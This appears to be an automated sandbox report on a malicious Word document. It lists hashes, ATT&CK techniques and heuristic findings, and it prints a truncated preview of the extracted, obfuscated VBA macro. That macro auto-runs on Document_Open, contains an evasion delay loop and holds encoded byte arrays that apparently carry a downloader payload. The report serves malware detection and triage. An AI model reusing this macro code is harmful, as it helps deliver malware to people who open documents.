Office (OLE) malware analysis — malicious · 776a8783eac0f703

MALICIOUS

Office (OLE)

210.0 KB Created: 2015-12-20 00:46:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 9a7a8a289a200953e41cdf4472a055a0 SHA-1: 876b6dd6b969da7e619bae57d6537b1dfd2cee33 SHA-256: 776a8783eac0f703fa2b423eea78948994e9735e6761438c6d28f99f4fa434cb

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains a VBA macro that is automatically executed upon opening the document (Document_Open). This macro utilizes the Shell() function, a common technique for executing arbitrary commands. The presence of the Shell() call strongly suggests the macro is intended to download and execute a secondary payload, making the document a downloader. No specific family could be identified.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45842 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45842 bytes
SHA-256: `0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long #Else Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long #End If Dim HLnJXH1bmOF3 As String, GyCvq As Integer Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant Sub Document_Open() R7O1H2H3zI = 66 + "25" On Error Resume Next MD1XgpZ1pvB55y = 22 + "85" Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long Ea7EVpjs = 70 + "46" Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0 BzWEvA933 = 88 + "20" For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME WFoVlONXW2AD = WFoVlONXW2AD + 1 Next Bna2eaHvItP2PN JZL4UQ92uel4B = 23 + "62" If WFoVlONXW2AD = Kf0pgDeD2QME Then SeLEK = 56 + "91" Dim S3VoJ54dB As Integer, B4HWNSKEwh As String For S3VoJ54dB = 6 To 974 B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB Next JJcm1AOrQT3 = 14 + "18" YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48) Qio6JWniPunO = 41 + "8" If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then SmEqmQo7WIE = 98 + "90" MYlp4jaVW = 67 + "77" If zKK(73) = True Then G2OERK33o = 48 + "8" SiNwcydd NsBU3RiWPAsR5kv = 90 + "79" Else NhJrp6cE4jcxsT5 = 89 + "58" MA9o9cPSK5hcO PMUmGTj7VBjk = 79 + "39" End If Else W1JPoqO = 93 + "45" MA9o9cPSK5hcO LIx5J0DQDSAph = 98 + "30" End If CxR = 70 + "43" Else Yh9QEdd8 = 52 + "97" MA9o9cPSK5hcO HxFz4G3yVn = 75 + "27" End If HDyHXOIsEi7F = 86 + "94" End Sub Sub MA9o9cPSK5hcO() DRJ9RcaC34U = 10 + "97" Stop Partition 58, 6, 35, 21 XmvssUFxoSD = Fix(90) DateSerial 55, 60, 54 Beep DateDiff "AyhPtMJO", 63, 89 REQh0kUI80hO = CVErr(10) Round 50, 76 Resume Log 51 H6JRAMZiRO1sMhOdf = 20 + "28" End Sub Sub JIT9N(PqcAr2DChjNPmswxj As Long) Ofj = 29 + "74" Dim MwUs As Long D8vzZy23Yrz = 26 + "9" MwUs = Timer + PqcAr2DChjNPmswxj Do While Timer < MwUs DoEvents Loop KKKBu1p93DmpgX = 77 + "1" End Sub Sub SiNwcydd() G1I0ynas = 45 + "84" On Error Resume Next EIbYaWWMmRw = 69 + "45" GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216) PeP = 79 + "67" GyCvq2 ... (truncated)

SHA-256: 0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long
#Else
Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long
#End If
Dim HLnJXH1bmOF3 As String, GyCvq As Integer
Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant
Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant
Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant
Sub Document_Open()
R7O1H2H3zI = 66 + "25"
On Error Resume Next
MD1XgpZ1pvB55y = 22 + "85"
Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long
Ea7EVpjs = 70 + "46"
Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0
BzWEvA933 = 88 + "20"
For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME
WFoVlONXW2AD = WFoVlONXW2AD + 1
Next Bna2eaHvItP2PN
JZL4UQ92uel4B = 23 + "62"
If WFoVlONXW2AD = Kf0pgDeD2QME Then
SeLEK = 56 + "91"
Dim S3VoJ54dB As Integer, B4HWNSKEwh As String
For S3VoJ54dB = 6 To 974
B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB
Next
JJcm1AOrQT3 = 14 + "18"
YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48)
Qio6JWniPunO = 41 + "8"
If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then
SmEqmQo7WIE = 98 + "90"
MYlp4jaVW = 67 + "77"
If zKK(73) = True Then
G2OERK33o = 48 + "8"
SiNwcydd
NsBU3RiWPAsR5kv = 90 + "79"
Else
NhJrp6cE4jcxsT5 = 89 + "58"
MA9o9cPSK5hcO
PMUmGTj7VBjk = 79 + "39"
End If
Else
W1JPoqO = 93 + "45"
MA9o9cPSK5hcO
LIx5J0DQDSAph = 98 + "30"
End If
CxR = 70 + "43"
Else
Yh9QEdd8 = 52 + "97"
MA9o9cPSK5hcO
HxFz4G3yVn = 75 + "27"
End If
HDyHXOIsEi7F = 86 + "94"
End Sub
Sub MA9o9cPSK5hcO()
DRJ9RcaC34U = 10 + "97"
Stop
Partition 58, 6, 35, 21
XmvssUFxoSD = Fix(90)
DateSerial 55, 60, 54
Beep
DateDiff "AyhPtMJO", 63, 89
REQh0kUI80hO = CVErr(10)
Round 50, 76
Resume
Log 51
H6JRAMZiRO1sMhOdf = 20 + "28"
End Sub
Sub JIT9N(PqcAr2DChjNPmswxj As Long)
Ofj = 29 + "74"
Dim MwUs As Long
D8vzZy23Yrz = 26 + "9"
MwUs = Timer + PqcAr2DChjNPmswxj
Do While Timer < MwUs
DoEvents
Loop
KKKBu1p93DmpgX = 77 + "1"
End Sub
Sub SiNwcydd()
G1I0ynas = 45 + "84"
On Error Resume Next
EIbYaWWMmRw = 69 + "45"
GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216)
PeP = 79 + "67"
GyCvq2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.